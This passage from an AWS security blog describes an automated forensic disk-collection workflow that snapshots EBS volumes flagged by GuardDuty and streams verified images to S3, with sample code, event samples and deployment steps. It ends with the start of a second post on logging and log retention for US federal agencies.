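    """Create a point-in-time EBS snapshot for each volume attached to the instance."""
    reservations = ec2.describe_instances(InstanceIds=[instance_id])["Reservations"]
    snapshot_ids = []
    for reservation in reservations:
        for instance in reservation["Instances"]:
            for mapping in instance.get("BlockDeviceMappings", []):
                if "Ebs" not in mapping:
                    continue
                volume_id = mapping["Ebs"]["VolumeId"]
                snapshot = ec2.create_snapshot(
                    VolumeId=volume_id,
                    Description=f"Forensic capture {incident_id} from {instance_id}",
                )
                snapshot_ids.append(snapshot["SnapshotId"])
    return snapshot_ids

print(snapshot_attached_volumes("i-1234567890abcdef0", "example-incident-id"))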

AWS Security Hub provides an aggregated view of security findings across AWS accounts, including findings produced by GuardDuty, when enabled. Security Hub also provides you with the ability to ingest custom or third-party findings, which makes it an excellent starting place for automation. This blog post uses EC2 GuardDuty findings collected into Security Hub as the example, but you can also use the same process to include custom detection events, or alerts from partner solutions such as CrowdStrike, McAfee, Sophos, Symantec, or others.

Infrastructure overview

The workflow described in this post automates the tasks that an IR team commonly takes during the course of an investigation.

Overview of disk collection workflow

The high-level disk collection workflow steps are as follows:

  1. Create a snapshot of each Amazon Elastic Block Store (Amazon EBS) volume attached to suspected instances.
  2. Create a folder in the Amazon Simple Storage Service (Amazon S3) evidence bucket with the original event data.
  3. Launch one Amazon EC2 instance per EBS volume, to be used in streaming a bit-for-bit copy of the EBS snapshot volume. These EC2 instances are launched without SSH key pairs, to help prevent any unintentional evidence corruption and to ensure consistent processing without user interaction. The EC2 instances use third-party tools dc3dd and incrond to trigger and process volumes.
  4. Write all logs from the workflow and instances to Amazon CloudWatch Logs log groups, for audit purposes.
  5. Include all EBS volumes in the S3 evidence bucket as raw image files (.dd), with the metadata from the automated capture process, as well as hashes for validation and verification (the sketch after this list illustrates the streaming and hashing idea).
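
The collector instances use dc3dd and incrond to perform the bit-for-bit copy, but the following minimal Python sketch illustrates the underlying idea of step 5: stream a raw device to Amazon S3 in parts while computing a hash that can later be used for verification. The device path, bucket name, and object key are placeholder assumptions.

import hashlib
import boto3

def stream_device_to_s3(device_path, bucket, key, chunk_size=8 * 1024 * 1024):
    """Stream a raw block device to S3 with a multipart upload while hashing it."""
    s3 = boto3.client("s3")
    sha512 = hashlib.sha512()
    upload = s3.create_multipart_upload(Bucket=bucket, Key=key)
    parts = []
    part_number = 1
    with open(device_path, "rb") as device:
        while True:
            chunk = device.read(chunk_size)
            if not chunk:
                break
            sha512.update(chunk)  # hash the same bytes that are uploaded
            response = s3.upload_part(
                Bucket=bucket, Key=key, PartNumber=part_number,
                UploadId=upload["UploadId"], Body=chunk,
            )
            parts.append({"ETag": response["ETag"], "PartNumber": part_number})
            part_number += 1
    s3.complete_multipart_upload(
        Bucket=bucket, Key=key, UploadId=upload["UploadId"],
        MultipartUpload={"Parts": parts},
    )
    return sha512.hexdigest()

# Placeholder device, bucket, and key
print(stream_device_to_s3("/dev/xvdf", "forensic-artifact-bucket", "example-incident-id/vol-99999999.image.dd"))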

Overview of AWS services used in the workflow

Another way of looking at this high-level workflow is from the service perspective, as shown in Figure 1.

Figure 1: Service workflow for forensic disk collection

The workflow in Figure 1 shows the following steps:

  1. A GuardDuty finding is triggered for an instance in a monitored account. This example focuses on a GuardDuty finding, but the initial detection source can also be a custom event, or an event from a third party.
  2. The Security Hub service in the monitored account receives the GuardDuty finding, and forwards it to the Security Hub service in the security account.
  3. The Security Hub service in the security account receives the monitored account’s finding.
  4. The Security Hub service emits an event to Amazon EventBridge for the GuardDuty findings, which is then matched by an EventBridge rule that forwards it to the DiskForensicsInvoke Lambda function. The following is the example event rule, which is included in the deployment. This example can be expanded or reduced to fit your use case. By default, the example is set to disabled in CloudFormation. When you are ready to use the automation, you will need to enable it.
    {
      "detail-type": [
        "Security Hub Findings - Imported"
      ],
      "source": [
        "aws.securityhub"
      ],
      "detail": {
        "findings": {
          "ProductFields": {
            "aws/securityhub/SeverityLabel": [
              "CRITICAL",
              "HIGH",
              "MEDIUM"
            ],
            "aws/securityhub/ProductName": [
              "GuardDuty"
            ]
          }
        }
      }
    }
    

  5. The DiskForensicsInvoke Lambda function receives the event from EventBridge, formats the event, and provides the formatted event as input to the AWS Step Functions workflow.
  6. The DiskForensicStepFunction workflow orchestrates the Lambda functions listed after Figure 2, from initial snapshot to streaming the evidence to the S3 bucket. After the Step Functions workflow enters the CopySnapshot state, it converts to a map state. This allows the workflow to have one thread per volume submitted, and ensures that each volume will be placed in the evidence bucket as quickly as possible without needing to wait for other steps to complete.
    Figure 2: Forensic disk collection Step Function workflow

    As shown in Figure 2, the following are the embedded Lambda functions in the DiskForensicStepFunction workflow:

    1. CreateSnapshot – This function creates the initial snapshots for each EBS volume attached to the instance in question. It also records instance metadata that is included with the snapshot data for each EBS volume.
      Required Environmental Variables: ROLE_NAME, EVIDENCE_BUCKET, LOG_GROUP
    2. CheckSnapshot – This function checks to see if the snapshots from the previous step are completed. If not, the function retries with an exponential backoff (see the sketch after this list).
      Required Environmental Variable: ROLE_NAME
    3. CopySnapshot – This function copies the initial snapshot and ensures that it is using the forensics AWS Key Management Service (AWS KMS) key. This key is stored in the security account and will be used throughout the remainder of the process.
      Required Environmental Variables: ROLE_NAME, KMS_KEY
    4. CheckCopySnapshot – This function checks to see if the snapshot from the previous step is completed. If not, the function retries with exponential backoff.
      Required Environmental Variable: ROLE_NAME
    5. ShareSnapshot – This function takes the copied snapshot using the forensics KMS key, and shares it with the security account.
      Required Environmental Variables: ROLE_NAME, SECURITY_ACCOUNT
    6. FinalCopySnapshot – This function copies the shared snapshot into the security account, as the original shared snapshot is still owned by the monitored account. This ensures that a copy is available, in case it has to be referenced for additional processing later.
      Required Environmental Variable: KMS_KEY
    7. FinalCheckSnapshot – This function checks to see if the snapshot from the previous step is completed. If not, the function fails and retries with an exponential backoff.
    8. CreateVolume – This function creates an EBS Magnetic volume from the snapshot in the previous step. The volumes are created as magnetic disks, because they are required for consistent hash results from the dc3dd process. The volume cannot use a solid state drive (SSD), because the hash would be different each time. If the EBS Magnetic volume size is greater than or equal to 500 GB, Amazon EBS switches from standard EBS Magnetic volumes to Throughput Optimized HDD (st1) volumes.
      Required Environmental Variables: KMS_KEY, SUPPORTED_AZS
    9. RunInstance – This function launches one EC2 instance per volume, to be used in streaming the volume to the S3 bucket. The AMI passed by the environmental variable needs to be created by using the provided Amazon EC2 Image Builder pipeline before you deploy the environment. This function also passes some user data to the instance: the artifact bucket, the source volume name, and the incident ID. This information is used by the instance when placing the evidence into the S3 bucket.
      Required Environmental Variables: AMI_ID, INSTANCE_PROFILE_NAME, VPC_ID, SECURITY_GROUP
    10. CreateInstanceWait – This function creates a 30-second wait, to allow the instance some additional time to spin up.
    11. MountForensicVolume – This function checks the CloudWatch log group ForensicDiskReadiness, to see that the incrond service is running on the instance. If the incrond service is running, the function attaches the volume to the instance and then writes the final logs to the S3 bucket and CloudWatch Logs.
      Required Environmental Variable: LOG_GROUP
  7. The instance that is created has pre-built tools and scripts on it from the template below, built by using Image Builder. This instance uses the incrond tool to monitor /dev/disk/by-label for new devices being attached to the instance. After the MountForensicVolume Lambda function attaches the volume to the instance, a file is created in the /dev/disk/by-label directory for the attached volume. The incrond daemon starts the orchestrator script, which calls the collector script. The collector script uses the dc3dd tool to stream the bit-for-bit copy of the volume to S3. After the copy has completed, the instance shuts down and is terminated. All logs from the process are sent to the S3 bucket and CloudWatch Logs.
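
The following is a minimal sketch of the kind of status check that CheckSnapshot, CheckCopySnapshot, and FinalCheckSnapshot perform. It assumes the Step Functions state machine supplies the snapshot IDs in the event and implements the backoff through its Retry configuration when the function raises an error; the input shape and exception name are illustrative.

import boto3

ec2 = boto3.client("ec2")

class SnapshotPendingError(Exception):
    """Raised so that the Step Functions Retry configuration can back off and retry."""

def lambda_handler(event, context):
    """Check whether all snapshots listed in the event have finished."""
    snapshot_ids = event["SnapshotIds"]  # illustrative input shape
    response = ec2.describe_snapshots(SnapshotIds=snapshot_ids)
    states = {s["SnapshotId"]: s["State"] for s in response["Snapshots"]}
    if any(state != "completed" for state in states.values()):
        # Raising an error lets the state machine retry with exponential backoff
        raise SnapshotPendingError(f"Snapshots not yet completed: {states}")
    return event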

The solution provided in the post includes the CloudFormation templates you need to get started, except for creating the initial EventBridge rule (which is provided in step 4 of the previous section). The solution includes an isolated VPC, subnets, security groups, roles, and more. The included VPC does not allow any egress through an internet gateway or NAT gateway, which is the recommended configuration. The only connectivity provided is through the S3 gateway VPC endpoint and the CloudWatch Logs interface VPC endpoint (also deployed in the template).

Deploy the CloudFormation templates

To implement the solution outlined in this post, you need to deploy three separate AWS CloudFormation templates in the order described in this section.

diskForensicImageBuilder (security account)

First, you deploy diskForensicImageBuilder in the security account. This template contains the resources and AMIs needed to create and run the Image Builder pipeline that is required to build the collector VM. This pipeline installs the required binaries and scripts, and updates the system.

Note: diskForensicImageBuilder is configured to use the default VPC and security group. If you have added restrictions or deleted your default VPC, you will need to modify the template.

To deploy the diskForensicImageBuilder template

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. Leave all default settings in place, and choose Next to configure the stack options.
  4. Choose Next to review and scroll to the bottom of the page. Select the check box under the Capabilities section, next to the acknowledgement:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  5. Choose Create Stack.
  6. After the Image Builder pipeline has been created, on the Image pipelines page, choose Actions and select Run pipeline to manually run the pipeline to create the base AMI.

    Figure 3: Run the new Image Builder pipeline

diskForensics (security account)

Second, you deploy diskForensics in the security account. This is a nested CloudFormation stack containing four CloudFormation templates. The four CloudFormation templates are as follows:

  1. forensicResources – This stack holds all of the foundation for the solution, including the VPC and networking components, the S3 evidence bucket, CloudWatch log groups, and collectorVM instance profile.

    Figure 4: Forensics VPC

  2. forensicFunctions – This stack contains all of the Lambda functions referenced in the Step Functions workflow as well as the role used by the Lambda functions.
  3. forensicStepFunction – This stack contains the Step Functions code, the role used by the Step Functions service, and the CloudWatch log group used by the service. It also contains an Amazon Simple Notification Service (SNS) topic used to alert on pipeline failure.
  4. forensicStepFunctionInvoke – This stack contains the DiskForensicsInvoke Lambda function and the role used by that Lambda function that allows it to call the Step Function workflow.

Note: You need to have the following required variables to continue:

  • ArtifactBucketName
  • ORGID
  • ForensicsAMI

If your accounts are not using AWS Organizations, you can use a dummy string for now. It adds a condition statement to the forensics KMS key that you can update or remove later.

To deploy the diskForensics stack

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. For the ORGID field, enter the AWS Organizations ID.

    Note: If you are not using AWS Organizations, leave the default string. If you are deploying as multi-account without AWS Organizations, you will need to update the KMS key policy to remove the principalOrgID condition statements, and add the correct principals.

  4. For the ArtifactBucketName field, enter the S3 bucket name you would like to use for your forensic artifacts.

    Important: The ArtifactBucketName must be a globally unique name.

  5. For the ForensicsAMI field, enter the AMI ID for the image that was created by Image Builder.
  6. For the example in this post, leave the default values for all other fields. Customizing these fields allows you to customize this code example for your own purposes.
  7. Choose Next to configure the stack options and leave all default settings in place.
  8. Choose Next to review and scroll to the bottom of the page. Select the two check boxes under the Capabilities section, next to each of the acknowledgements:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
    • I acknowledge that AWS CloudFormation might require the following capability: CAPABILITY_AUTO_EXPAND.
  9. Choose Create Stack.
  10. After the stack has completed provisioning, subscribe to the Amazon SNS topic to receive pipeline alerts.

diskMember (each monitored account)

Third, you deploy diskMember in each monitored account. This stack contains the role and policy that the automation workflow needs to assume, so that it can create the initial snapshots and share the snapshot with the security account. If you are deploying this solution in a single account, you deploy diskMember in the security account.

Important: Ensure that all KMS keys that could be used to encrypt EBS volumes in each monitored account grant this role the ability to CreateGrant, Encrypt, Decrypt, ReEncrypt*, GenerateDataKey*, and DescribeKey. The default policy grants the permissions in AWS Identity and Access Management (IAM), but any restrictive resource policies could block the ability to create the initial snapshot and decrypt the snapshot when making the copy.

To deploy the diskMember stack

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
    If deploying across multiple accounts, consider using AWS CloudFormation StackSets for simplified multi-account deployment.
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. For the MasterAccountNum field, enter the account number for your security administrator account.
  4. Choose Next to configure the stack options and leave all default settings in place.
  5. Choose Next to review and scroll to the bottom of the page. Select the check box under the Capabilities section, next to the acknowledgement:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  6. Choose Create Stack.

Test the solution

Next, you can try this solution with an event sample to start the workflow.

To initiate a test run

  1. Copy the following example GuardDuty event. The example uses the AWS Region us-east-1, but you can update the example to use another Region. Be sure to replace the account ID 0123456789012 with the account number of your monitored account, and replace the instance ID i-99999999 with the instance ID you would like to capture.
    {
      "SchemaVersion": "2018-10-08",
      "Id": "arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
      "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/guardduty",
      "GeneratorId": "arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14",
      "AwsAccountId": "0123456789012",
      "Types": [
        "Effects/Resource Consumption/UnauthorizedAccess:EC2-TorClient"
      ],
      "FirstObservedAt": "2020-10-22T03:52:13.438Z",
      "LastObservedAt": "2020-10-22T03:52:13.438Z",
      "CreatedAt": "2020-10-22T03:52:13.438Z",
      "UpdatedAt": "2020-10-22T03:52:13.438Z",
      "Severity": {
        "Product": 8,
        "Label": "HIGH",
        "Normalized": 60
      },
      "Title": "EC2 instance i-99999999 is communicating with Tor Entry node.",
      "Description": "EC2 instance i-99999999 is communicating with IP address 198.51.100.0 on the Tor Anonymizing Proxy network marked as an Entry node.",
      "SourceUrl": "https://us-east-1.console.aws.amazon.com/guardduty/home?region=us-east-1#/findings?macros=current&fId=b0baa737c3bf7309db2a396651fdb500",
      "ProductFields": {
        "aws/guardduty/service/action/networkConnectionAction/remotePortDetails/portName": "HTTP",
        "aws/guardduty/service/archived": "false",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/asnOrg": "GeneratedFindingASNOrg",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/Geolocation/lat": "0",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/ipAddressV4": "198.51.100.0",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/Geolocation/lon": "0",
        "aws/guardduty/service/action/networkConnectionAction/blocked": "false",
        "aws/guardduty/service/action/networkConnectionAction/remotePortDetails/port": "80",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/country/countryName": "GeneratedFindingCountryName",
        "aws/guardduty/service/serviceName": "guardduty",
        "aws/guardduty/service/action/networkConnectionAction/localIpDetails/ipAddressV4": "10.0.0.23",
        "aws/guardduty/service/detectorId": "f2b82a2b2d8d8541b8c6d2c7d9148e14",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/org": "GeneratedFindingORG",
        "aws/guardduty/service/action/networkConnectionAction/connectionDirection": "OUTBOUND",
        "aws/guardduty/service/eventFirstSeen": "2020-10-22T03:52:13.438Z",
        "aws/guardduty/service/eventLastSeen": "2020-10-22T03:52:13.438Z",
        "aws/guardduty/service/evidence/threatIntelligenceDetails.0_/threatListName": "GeneratedFindingThreatListName",
        "aws/guardduty/service/action/networkConnectionAction/localPortDetails/portName": "Unknown",
        "aws/guardduty/service/action/actionType": "NETWORK_CONNECTION",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/city/cityName": "GeneratedFindingCityName",
        "aws/guardduty/service/resourceRole": "TARGET",
        "aws/guardduty/service/action/networkConnectionAction/localPortDetails/port": "39677",
        "aws/guardduty/service/action/networkConnectionAction/protocol": "TCP",
        "aws/guardduty/service/count": "1",
        "aws/guardduty/service/additionalInfo/sample": "true",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/asn": "-1",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/isp": "GeneratedFindingISP",
        "aws/guardduty/service/evidence/threatIntelligenceDetails.0_/threatNames.0_": "GeneratedFindingThreatName",
        "aws/securityhub/FindingId": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
        "aws/securityhub/ProductName": "GuardDuty",
        "aws/securityhub/CompanyName": "Amazon"
      },
      "Resources": [
        {
          "Type": "AwsEc2Instance",
          "Id": "arn:aws:ec2:us-east-1:0123456789012:instance/i-99999999",
          "Partition": "aws",
          "Region": "us-east-1",
          "Tags": {
            "GeneratedFindingInstaceTag7": "GeneratedFindingInstaceTagValue7",
            "GeneratedFindingInstaceTag8": "GeneratedFindingInstaceTagValue8",
            "GeneratedFindingInstaceTag9": "GeneratedFindingInstaceTagValue9",
            "GeneratedFindingInstaceTag1": "GeneratedFindingInstaceValue1",
            "GeneratedFindingInstaceTag2": "GeneratedFindingInstaceTagValue2",
            "GeneratedFindingInstaceTag3": "GeneratedFindingInstaceTagValue3",
            "GeneratedFindingInstaceTag4": "GeneratedFindingInstaceTagValue4",
            "GeneratedFindingInstaceTag5": "GeneratedFindingInstaceTagValue5",
            "GeneratedFindingInstaceTag6": "GeneratedFindingInstaceTagValue6"
          },
          "Details": {
            "AwsEc2Instance": {
              "Type": "m3.xlarge",
              "ImageId": "ami-99999999",
              "IpV4Addresses": [
                "10.0.0.1",
                "198.51.100.0"
              ],
              "IamInstanceProfileArn": "arn:aws:iam::0123456789012:example/instance/profile",
              "VpcId": "GeneratedFindingVPCId",
              "SubnetId": "GeneratedFindingSubnetId",
              "LaunchedAt": "2016-08-02T02:05:06Z"
            }
          }
        }
      ],
      "WorkflowState": "NEW",
      "Workflow": {
        "Status": "NEW"
      },
      "RecordState": "ACTIVE"
    }
    

  2. Navigate to the DiskForensicsInvoke Lambda function and add the GuardDuty event as a test event.
  3. Choose Test. You should see a successful invocation. (Alternatively, you can invoke the function programmatically, as sketched after this list.)
  4. Navigate to the Step Functions workflow to monitor its progress. When the instances have terminated, all of the artifacts should be in the S3 bucket with additional logs in CloudWatch Logs.
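
As an alternative to the console test in the previous steps, the following is a minimal sketch of invoking the function programmatically with Boto3; the function name and the sample event file name are assumptions that you would match to your deployment.

import json
import boto3

lambda_client = boto3.client("lambda")

def send_test_event(function_name, event_path):
    """Invoke the DiskForensicsInvoke Lambda function with a sample GuardDuty event."""
    with open(event_path) as f:
        payload = json.load(f)
    response = lambda_client.invoke(
        FunctionName=function_name,
        InvocationType="RequestResponse",
        Payload=json.dumps(payload).encode("utf-8"),
    )
    print("StatusCode:", response["StatusCode"])

send_test_event("DiskForensicsInvoke", "sample-guardduty-event.json")  # assumed names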

Expected outputs

The forensic disk collection pipeline maintains logs of the actions throughout the process, and uploads the final artifacts to the S3 artifact bucket and CloudWatch Logs. This enables security teams to send forensic collection logs to log aggregation tools or service management tools for additional integrations. The expected outputs of the solution are detailed in the following sections, organized by destination.

S3 artifact outputs

The S3 artifact bucket is the final destination for all logs and the raw disk images. For each security incident that triggers the Step Functions workflow, a new folder will be created with the name of the IncidentID. Included in this folder will be the JSON file that triggered the capture operation, the image (dd) files for the volumes, the capture log, and the resources associated with the capture operation, as shown in Figure 5.

Figure 5: Forensic artifacts in the S3 bucket

Forensic Disk Audit log group

The Forensic Disk Audit CloudWatch log group contains a log of where the Step Functions workflow was after creating the initial snapshots in the CreateSnapshot Lambda function. This includes the high-level finding information, as well as the metadata for each snapshot. Also included in this log group is the data for each completed disk collection operation, including all associated resources and the location of the forensic evidence in the S3 bucket. The following event is an example log demonstrating a completed capture. Notice all of the metadata provided under captured snapshots. Be sure to update the example to use the correct AWS Region. Replace the account ID 0123456789012 with the account number of your monitored account, and replace the instance ID i-99999999 with the instance ID you would like to capture.

{
  "AwsAccountId": "0123456789012",
  "Types": [
    "Effects/Resource Consumption/UnauthorizedAccess:EC2-TorClient"
  ],
  "FirstObservedAt": "2020-10-22T03:52:13.438Z",
  "LastObservedAt": "2020-10-22T03:52:13.438Z",
  "CreatedAt": "2020-10-22T03:52:13.438Z",
  "UpdatedAt": "2020-10-22T03:52:13.438Z",
  "Severity": {
    "Product": 8,
    "Label": "HIGH",
    "Normalized": 60
  },
  "Title": "EC2 instance i-99999999 is communicating with Tor Entry node.",
  "Description": "EC2 instance i-99999999 is communicating with IP address 198.51.100.0 on the Tor Anonymizing Proxy network marked as an Entry node.",
  "FindingId": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
  "Resource": {
    "Type": "AwsEc2Instance",
    "Arn": "arn:aws:ec2:us-east-1:0123456789012:instance/i-99999999",
    "Id": "i-99999999",
    "Partition": "aws",
    "Region": "us-east-1",
    "Details": {
      "AwsEc2Instance": {
        "Type": "m3.xlarge",
        "ImageId": "ami-99999999",
        "IpV4Addresses": [
          "10.0.0.1",
          "198.51.100.0"
        ],
        "IamInstanceProfileArn": "arn:aws:iam::0123456789012:example/instance/profile",
        "VpcId": "GeneratedFindingVPCId",
        "SubnetId": "GeneratedFindingSubnetId",
        "LaunchedAt": "2016-08-02T02:05:06Z"
      }
    }
  },
  "EvidenceBucket": "forensic-artifact-bucket",
  "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
  "CapturedSnapshots": [
    {
      "SourceSnapshotID": "snap-99999999",
      "SourceVolumeID": "vol-99999999",
      "SourceDeviceName": "/dev/xvda",
      "VolumeSize": 100,
      "InstanceID": "i-99999999",
      "FindingID": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
      "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
      "AccountID": "0123456789012",
      "Region": "us-east-1",
      "EvidenceBucket": "forensic-artifact-bucket"
    }
  ]
}
{
  "SourceSnapshotID": "snap-99999999",
  "SourceVolumeID": "vol-99999999",
  "SourceDeviceName": "/dev/sdd",
  "VolumeSize": 100,
  "InstanceID": "i-99999999",
  "FindingID": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
  "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
  "AccountID": "0123456789012",
  "Region": "us-east-1",
  "EvidenceBucket": "forensic-artifact-bucket",
  "CopiedSnapshotID": "snap-99999998",
  "EncryptionKey": "arn:aws:kms:us-east-1:0123456789012:key/e793cbd3-ce6a-4b17-a48f-7e78984346f2",
  "FinalCopiedSnapshotID": "snap-99999997",
  "ForensicVolumeID": "vol-99999998",
  "VolumeAZ": "us-east-1a",
  "ForensicInstances": [
    "i-99999998"
  ],
  "DiskImageLocation": "s3://forensic-artifact-bucket/b0baa737c3bf7309db2a396651fdb500/disk_evidence/vol-99999999.image.dd"
}

Forensic Disk Capture log group

The Forensic Disk Capture CloudWatch log group contains the logs from the EC2Collector VM. These logs detail the operations taken by the instance, which include when the dc3dd command was executed, what the transfer speed was to the S3 bucket, what the hash of the volume was, and how long the total operation took to complete. The log example in Figure 6 shows the output of the disk capture on the collector instance.

Figure 6: Forensic Disk Capture logs

Cost and capture times

This solution may save you money over a traditional system that requires bastion hosts (jump boxes) and forensic instances to be readily available. With AWS, you pay only for the individual services you need, for as long as you use them. The cost of this solution is minimal, because charges are only incurred based on the logs or artifacts that you store in CloudWatch or Amazon S3, and the invocation of the Step Functions workflow. Additionally, resources such as the collectorVM are only created and used when needed.

This solution can also save you time. If an analyst was manually working through this workflow, it could take significantly more time than the automated solution. The following are some examples of collection times. You can see that even when the manual workflow time increases, the automated workflow time stays the same, because of how the solution scales.

Scenario 1: EC2 instance with one 8GB volume

  • Automated workflow: 11 minutes
  • Manual workflow: 15 minutes

Scenario 2: EC2 instance with four 8GB volumes

  • Automated workflow: 11 minutes
  • Manual workflow: 1 hour 10 minutes

Scenario 3: Four EC2 instances with one 8GB volume each

  • Automated workflow: 11 minutes
  • Manual workflow: 1 hour 20 minutes

Clean up and delete artifacts

To clean up the artifacts from the solution in this post, first delete all information in your artifact S3 bucket. Then delete the diskForensics stack, followed by the diskForensicImageBuilder stack, and finally the diskMember stack. You must also manually delete any EBS volumes or EBS snapshots created by the pipeline; these are not deleted automatically. Finally, you must manually delete the AMI and images that are created and published by Image Builder.
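
The following is a minimal sketch of one way to find and delete leftover snapshots, assuming you can identify them by a tag that you have the pipeline apply; the tag key and value are placeholder assumptions, and you should confirm that a snapshot is no longer needed as evidence before you delete it.

import boto3

ec2 = boto3.client("ec2")

def delete_tagged_snapshots(tag_key, tag_value, dry_run=True):
    """Delete snapshots that carry a specific tag (placeholder tagging scheme)."""
    paginator = ec2.get_paginator("describe_snapshots")
    pages = paginator.paginate(
        OwnerIds=["self"],
        Filters=[{"Name": f"tag:{tag_key}", "Values": [tag_value]}],
    )
    for page in pages:
        for snapshot in page["Snapshots"]:
            print("Deleting", snapshot["SnapshotId"])
            if not dry_run:
                ec2.delete_snapshot(SnapshotId=snapshot["SnapshotId"])

delete_tagged_snapshots("forensic-pipeline", "true")  # placeholder tag key and value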

Considerations

This solution covers EBS volume storage as the target for forensic disk capture. If your instances use Amazon EC2 instance store volumes, you cannot snapshot and copy those volumes, because that data is not included in an EBS snapshot operation. Instead, consider running the commands that are included in the collector.sh script with AWS Systems Manager, as sketched below. The collector.sh script is included in the Image Builder recipe and uses dc3dd to stream a copy of the volume to Amazon S3.
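
The following is a minimal sketch of running such a script on an instance through AWS Systems Manager Run Command by using Boto3; the script path and arguments are placeholder assumptions rather than the solution's exact interface.

import boto3

ssm = boto3.client("ssm")

def run_collector_script(instance_id, bucket, incident_id):
    """Run a collection script on an instance by using Systems Manager Run Command."""
    response = ssm.send_command(
        InstanceIds=[instance_id],
        DocumentName="AWS-RunShellScript",
        Comment=f"Forensic collection for incident {incident_id}",
        Parameters={
            # Placeholder script path and arguments
            "commands": [f"/opt/forensics/collector.sh {bucket} {incident_id}"]
        },
    )
    return response["Command"]["CommandId"]

print(run_collector_script("i-1234567890abcdef0", "forensic-artifact-bucket", "example-incident-id"))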

Conclusion

Having this solution in place across your AWS accounts will enable fast response times to security events, because it helps ensure that forensic artifacts are collected and stored as quickly as possible. Download the .zip file for the solutions in CloudFormation, so that you can deploy this solution and get started on your own forensic automation workflows. For the talks describing this solution, see the video of SEC306 from re:Invent 2020 and the AWS Online Tech Talk AWS Digital Forensics Automation at Goldman Sachs.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon GuardDuty forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Matt Duda

Matt is a Senior Cloud Security Architect with AWS Professional Services. He has an extensive background in cybersecurity in the financial services sector. He is obsessed with helping customers improve their ability to prevent, prepare for, and respond to potential security events in AWS, utilizing automation wherever possible.

Contributor

Special thanks to Logan Bair who made significant contributions to this post.

How US federal agencies can use AWS to improve logging and log retention

Post Syndicated from Derek Doerr original https://aws.amazon.com/blogs/security/how-us-federal-agencies-can-use-aws-to-improve-logging-and-log-retention/

This post is part of a series about how Amazon Web Services (AWS) can help your US federal agency meet the requirements of the President’s Executive Order on Improving the Nation’s Cybersecurity. You will learn how you can use AWS information security practices to help meet the requirement to improve logging and log retention practices in your AWS environment.

Improving the security and operational readiness of applications relies on improving the observability of the applications and the infrastructure on which they operate. For our customers, this translates to questions of how to gather the right telemetry data, how to securely store it over its lifecycle, and how to analyze the data in order to make it actionable. These questions take on more importance as our federal customers seek to improve their collection and management of log data in all their IT environments, including their AWS environments, as mandated by the executive order.

Given the interest in the technologies used to support logging and log retention, we’d like to share our perspective. This starts with an overview of logging concepts in AWS, including log storage and management, and then proceeds to how to gain actionable insights from that logging data. This post will address how to improve logging and log retention practices consistent with the Security and Operational Excellence pillars of the AWS Well-Architected Framework.

Log actions and activity within your AWS account

AWS provides you with extensive logging capabilities to provide visibility into actions and activity within your AWS account. A security best practice is to establish a wide range of detection mechanisms across all of your AWS accounts. Starting with services such as AWS CloudTrail, AWS Config, Amazon CloudWatch, Amazon GuardDuty, and AWS Security Hub provides a foundation upon which you can base detective controls, remediation actions, and forensics data to support incident response. Here is more detail on how these services can help you gain more security insights into your AWS workloads:

  • AWS CloudTrail provides event history for all of your AWS account activity, including API-level actions taken through the AWS Management Console, AWS SDKs, command line tools, and other AWS services. You can use CloudTrail to identify who or what took which action, what resources were acted upon, when the event occurred, and other details (see the sketch after this list). If your agency uses AWS Organizations, you can automate this process for all of the accounts in the organization.
  • CloudTrail logs can be delivered from all of your accounts into a centralized account. This places all logs in a tightly controlled, central location, making it easier to both protect them and to store and analyze them. As with AWS CloudTrail, you can automate this process for all of the accounts in the organization by using AWS Organizations. CloudTrail can also be configured to emit metric data into the CloudWatch monitoring service, giving near real-time insights into the usage of various services.
  • CloudTrail log file integrity validation produces and cryptographically signs a digest file that contains references and hashes for every CloudTrail log file that was delivered in that hour. This makes it computationally infeasible to modify, delete, or forge CloudTrail log files without detection. Validated log files are invaluable in security and forensic investigations. For example, a validated log file enables you to assert positively that the log file itself has not changed, or that particular user credentials performed specific API activity.
